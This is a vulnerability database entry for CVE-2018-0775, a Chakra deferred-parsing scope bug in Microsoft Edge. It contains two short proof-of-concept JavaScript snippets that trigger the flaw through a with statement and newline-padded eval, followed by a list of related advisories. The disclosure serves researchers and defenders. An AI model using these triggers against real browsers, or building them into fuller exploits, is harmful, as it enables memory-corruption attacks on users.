Lucene search
RootSSV:97097HistoryJan 22, 2018 - 12:00 a.m.
Microsoft Edge: Chakra: Deferred parsing makes wrong scopes #2(CVE-2018-0775)
2018-01-2200:00:00
Root
www.seebug.org
29
0.96 High
EPSS
Percentile
99.3%
Since the PoC is only triggerable when the âDeferParseâ flag enabled and requires a with statement, I think this is simillar to issue 1310 .
PoC:
// Enable the flag using '\n'.repeat(0x1000)
eval(`(function f() {
with ({}) {
(function () {
print(f);
})();
}
}());` + '\n'.repeat(0x1000));
PoC 2:
// ./ch poc.js -ForceDeferParse
(function f() {
with ({}) {
(function () {
print(f);
})();
}
}());
// Enable the flag using '\n'.repeat(0x1000)
eval(`(function f() {
with ({}) {
(function () {
print(f);
})();
}
}());` + '\n'.repeat(0x1000));
Related
zdt
zdt
Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes (2)
2018-01-18 00:00:00
mscve
mscve
Scripting Engine Memory Corruption Vulnerability
2018-01-03 08:00:00
packetstorm
packetstorm
Microsoft Edge Chakra Deferred Parsing
2018-01-18 00:00:00
symantec
symantec
prion
prion
Memory corruption
2018-01-04 14:29:00
Memory corruption
2018-01-04 14:29:00
Memory corruption
2018-01-04 14:29:00
veracode
veracode
Remote Code Execution (RCE)
2018-07-04 08:44:16
Remote Code Execution (RCE)
2018-07-04 08:14:35
Remote Code Execution (RCE)
2018-07-05 01:12:57
osv
osv
cve
cve
kaspersky
kaspersky
KLA11166 Multiple vunlerabilities in Microsoft Browsers
2018-01-03 00:00:00
mskb
mskb
January 3, 2018âKB4056892 (OS Build 16299.192)
2018-01-09 08:00:00
openvas
openvas
Microsoft Windows Multiple Vulnerabilities (KB4056892)
2018-01-04 00:00:00
nessus
nessus
talosblog
talosblog
Microsoft Patch Tuesday - January 2018
2018-01-09 13:36:00
trendmicroblog
trendmicroblog